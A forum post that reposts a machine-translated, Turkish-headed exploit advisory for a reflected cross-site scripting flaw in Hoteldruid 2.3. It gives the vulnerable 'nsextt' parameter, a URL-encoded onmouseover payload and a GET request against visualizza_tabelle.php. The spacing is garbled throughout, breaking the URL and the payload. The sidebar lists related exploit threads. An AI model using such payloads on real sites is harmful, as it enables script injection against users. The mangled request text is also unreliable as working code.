Hoteldruid 2.3 - Multiple XSS Vuln.
by storix - 05-30-2019, 10:39 PM
#1
===========================================================================================
# Başlık Exploit: Hoteldruid 2.3 - 'nsextt' XSS Injection
# CVE: 
# Tarih: 18-02-2019
# Exploit Author: Kybre
# Satıcı Web Sitesi: https://sourceforge.net/projects/hoteldruid/
# Yazılım Bağlantı: https://sourceforge.net/projects/hoteldruid/
# Sürüm: v2.3
# Kategori: webapps
Wamp64, @Win: # üzerinde test
# Yazılım descr * iption: HotelDruid otel ve hostel odaları hale getirmek için tasarlanmış bir emlak yönetim sistemi (PMS) 'dir
Oda ve kahvaltı daire, ya da bir web tarayıcısından yönetmek kolay günlük kiralama başka türlü.
===========================================================================================
# POC - XSS
# Parametreler: nsextt
# Saldırı Kalıbı: x% 22 + onmouseover% 3dalert (0x000981) + x% 3d% 22
# GET İsteği: http: //localhost/hoteldruid/visualizza_tabelle.php nsextt = x "onmouseover = alert (0x000981) x =" 
===========================================================================================
###########################################################################################
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Newsbull Haber Script XSS Vuln. Adient 0 147 05-30-2019, 10:55 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 104 05-30-2019, 10:54 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 82 05-30-2019, 10:52 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)